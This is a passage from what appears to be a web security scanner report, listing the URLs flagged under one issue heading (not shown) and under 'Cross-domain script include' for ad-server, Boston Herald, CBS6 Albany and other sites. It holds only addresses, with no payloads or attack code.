17.80. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment

17.81. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment/events

17.82. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/weather

17.83. http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience

17.84. http://ad.turn.com/server/ads.js

17.85. http://ad.turn.com/server/ads.js

17.86. http://ad.turn.com/server/ads.js

17.87. http://ad.turn.com/server/ads.js

17.88. http://ad.turn.com/server/ads.js

17.89. http://ad.turn.com/server/ads.js

17.90. http://ad.turn.com/server/ads.js

17.91. http://ads.bluelithium.com/st

17.92. http://ads.roiserver.com/disp

17.93. http://adsfac.us/link.asp

17.94. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

17.95. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

17.96. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

17.97. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

17.98. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

17.99. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

17.100. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

17.101. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

17.102. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90

17.103. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90

17.104. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90

17.105. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

17.106. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

17.107. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90

17.108. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90

17.109. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

17.110. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

17.111. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90

17.112. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90

17.113. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

17.114. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

17.115. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90

17.116. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

17.117. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

17.118. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

17.119. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

17.120. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

17.121. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

17.122. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90

17.123. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

17.124. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

17.125. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

17.126. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

17.127. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90

17.128. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90

17.129. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90

17.130. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

17.131. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

17.132. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

17.133. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

17.134. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

17.135. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

17.136. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

17.137. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

17.138. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

17.139. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

17.140. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

17.141. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

17.142. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

17.143. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

17.144. https://base.liveperson.net/hc/5296924/

17.145. http://bh.heraldinteractive.com/includes/processAds.bg

17.146. http://bh.heraldinteractive.com/includes/processAds.bg

17.147. http://bh.heraldinteractive.com/includes/processAds.bg

17.148. http://bh.heraldinteractive.com/includes/processAds.bg

17.149. http://bh.heraldinteractive.com/includes/processAds.bg

17.150. http://boston30.autochooser.com/results.asp

17.151. http://bostonherald.com/blogs/entertainment/the_assistant/

17.152. http://bostonherald.com/blogs/lifestyle/fork_lift/

17.153. http://bostonherald.com/news/document.bg

17.154. http://bostonherald.com/projects/your_tax_dollars.bg

17.155. http://bostonherald.com/search/

17.156. http://bostonherald.com/search/

17.157. http://bostonherald.com/sports/football/patriots/view.bg

17.158. http://bostonherald.com/track/inside_track/

17.159. http://bostonherald.com/track/inside_track/view.bg

17.160. http://bostonherald.com/track/inside_track/view.bg

17.161. http://bostonherald.com/track/inside_track/view.bg

17.162. http://bostonherald.com/track/star_tracks/

17.163. http://bostonherald.com/track/star_tracks/view.bg

17.164. http://bostonherald.com/track/star_tracks/view.bg

17.165. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

17.166. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

17.167. http://common.onset.freedom.com/fi/adsense/

17.168. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.169. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.170. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.171. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.172. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.173. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.174. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.175. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.176. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.177. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.178. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.179. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.180. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.181. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

17.182. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

17.183. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

17.184. http://digg.com/submit

17.185. http://events.cbs6albany.com/

17.186. http://events.cbs6albany.com/

17.187. http://events.cbs6albany.com/search

17.188. http://events.cbs6albany.com/user/login

17.189. http://events.cbs6albany.com/user/signup

17.190. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

17.191. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

17.192. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

17.193. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

17.194. http://ib.adnxs.com/ab

17.195. http://ib.adnxs.com/ptj

17.196. http://jqueryui.com/themeroller/

17.197. http://local.nissanusa.com/zip.aspx

17.198. http://network.realmedia.com/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1

17.199. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

17.200. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

17.201. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

17.202. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

17.203. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

17.204. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

17.205. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

17.206. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c

17.207. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

17.208. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1381389243/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

17.209. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

17.210. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

17.211. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c

17.212. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

17.213. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

17.214. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

17.215. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

17.216. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

17.217. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

17.218. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/328960883/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

17.219. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/572126538/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

17.220. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

17.221. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

17.222. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

17.223. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/788685001/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

17.224. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

17.225. http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3

17.226. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/1304732975/Position1/BostonHerald/JobfindFeatured/MJMConstructionCorp.html/72634857383031444f386b4144567663

17.227. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/2007038988/x15/BostonHerald/HerbChambers_234x60/herbChambers234x60a.gif/72634857383031444f386741434e6f35

17.228. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/49256996/x16/BostonHerald/BooCoo_234x60/boocoo_BlueWhite_234x60.jpg/72634857383031444f386741434e6f35

17.229. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/855079761/Position2/BostonHerald/JobfindFeatured/EverettNursing.html/72634857383031444f386b4144567663

17.230. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

17.231. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1217332109/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.232. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1258879011/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.233. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

17.234. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

17.235. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/178441265/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.236. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

17.237. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1852599113/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.238. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2058755968/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.239. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663

17.240. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2124335020/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.241. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663

17.242. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663

17.243. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/371110779/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

17.244. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

17.245. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663

17.246. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

17.247. http://pixel.invitemedia.com/rubicon_sync

17.248. http://pixel.invitemedia.com/rubicon_sync

17.249. http://scores.heraldinteractive.com/merge/tsnform.aspx

17.250. http://smm.sitescout.com/disp

17.251. http://smm.sitescout.com/disp

17.252. http://tag.contextweb.com/TAGPUBLISH/getad.aspx

17.253. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

17.254. http://twitter.com/

17.255. http://twitter.com/malsup

17.256. http://twitter.com/malsup

17.257. http://twitter.com/search

17.258. http://twitter.com/search

17.259. http://twitter.com/search

17.260. http://twitter.com/share

17.261. http://www.addthis.com/bookmark.php

17.262. http://www.berkshireeagle.com/portlet/weather/html/process_mode.jsp

17.263. http://www.bostonherald.com/

17.264. http://www.bostonherald.com/blogs/sports/rap_sheet/

17.265. http://www.bostonherald.com/business/

17.266. http://www.bostonherald.com/business/general/

17.267. http://www.bostonherald.com/business/general/view.bg

17.268. http://www.bostonherald.com/entertainment/

17.269. http://www.bostonherald.com/entertainment/movies/reviews/view.bg

17.270. http://www.bostonherald.com/galleries/index.php

17.271. http://www.bostonherald.com/homepage.bg

17.272. http://www.bostonherald.com/index.bg

17.273. http://www.bostonherald.com/jobfind/

17.274. http://www.bostonherald.com/mediacenter/index.php

17.275. http://www.bostonherald.com/mediacenter/video.php

17.276. http://www.bostonherald.com/mediacenter/video.php

17.277. http://www.bostonherald.com/news/

17.278. http://www.bostonherald.com/news/columnists/

17.279. http://www.bostonherald.com/news/columnists/view.bg

17.280. http://www.bostonherald.com/news/international/africa/view.bg

17.281. http://www.bostonherald.com/news/national/general/view.bg

17.282. http://www.bostonherald.com/news/offbeat/

17.283. http://www.bostonherald.com/news/politics/

17.284. http://www.bostonherald.com/news/politics/view.bg

17.285. http://www.bostonherald.com/news/politics/view.bg

17.286. http://www.bostonherald.com/news/politics/view.bg

17.287. http://www.bostonherald.com/news/regional/

17.288. http://www.bostonherald.com/news/regional/view.bg

17.289. http://www.bostonherald.com/news/regional/view.bg

17.290. http://www.bostonherald.com/news/regional/view.bg

17.291. http://www.bostonherald.com/news/regional/view.bg

17.292. http://www.bostonherald.com/photobox/index.bg

17.293. http://www.bostonherald.com/projects/mcas2009

17.294. http://www.bostonherald.com/projects/your_tax_dollars.bg

17.295. http://www.bostonherald.com/search/

17.296. http://www.bostonherald.com/search/

17.297. http://www.bostonherald.com/search/

17.298. http://www.bostonherald.com/search/

17.299. http://www.bostonherald.com/search/

17.300. http://www.bostonherald.com/sports/football/patriots/view.bg

17.301. http://www.bostonherald.com/sports/football/patriots/view.bg

17.302. http://www.bostonherald.com/track/

17.303. http://www.bostonherald.com/track/celebrity/

17.304. http://www.bostonherald.com/track/celebrity/view.bg

17.305. http://www.bostonherald.com/track/inside_track/

17.306. http://www.bostonherald.com/track/inside_track/view.bg

17.307. http://www.bostonherald.com/track/star_tracks/

17.308. http://www.bostonherald.com/track/star_tracks/view.bg

17.309. http://www.bostonherald.com/users/register

17.310. http://www.cbs6albany.com/common/archives/

17.311. http://www.cbs6albany.com/common/archives/

17.312. http://www.cbs6albany.com/common/tools/load.php

17.313. http://www.cbs6albany.com/sections/thirdParty/iframe_header/

17.314. http://www.moxiesoft.com/search.aspx

17.315. http://www.moxiesoft.com/tal_lp/campaign.aspx

17.316. http://www.moxiesoft.com/tal_lp/default.aspx

17.317. http://www.moxiesoft.com/tal_news/press_release.aspx

17.318. http://www.moxiesoft.com/tal_news/webinars/default.aspx

17.319. http://www.moxiesoft.com/tal_products/chat.aspx

17.320. http://www.moxiesoft.com/tal_products/chat_tour2.aspx

17.321. http://www.moxiesoft.com/tal_resources/content.aspx

17.322. https://www.paperg.com/post.php

17.323. http://www.soundingsonline.com/component/chronocontact/

17.324. http://www.soundingsonline.com/index.php

17.325. http://www.soundingsonline.com/index.php

17.326. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

17.327. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

17.328. http://www.zvents.com/

17.329. http://xads.zedo.com/ads2/c

18. Cross-domain script include

18.1. http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

18.2. http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

18.3. http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

18.4. http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

18.5. http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

18.6. http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

18.7. http://ad.afy11.net/ad

18.8. http://ad.afy11.net/ad

18.9. http://ad.afy11.net/ad

18.10. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2

18.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

18.12. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17

18.13. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

18.14. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

18.15. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

18.16. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

18.17. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

18.18. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

18.19. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

18.20. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

18.21. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

18.22. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

18.23. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

18.24. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382

18.25. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4

18.26. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5

18.27. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

18.28. http://ad.turn.com/server/ads.js

18.29. http://ad.turn.com/server/ads.js

18.30. http://ad.turn.com/server/ads.js

18.31. http://ad.turn.com/server/ads.js

18.32. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

18.33. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

18.34. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

18.35. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

18.36. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

18.37. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

18.38. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

18.39. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

18.40. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

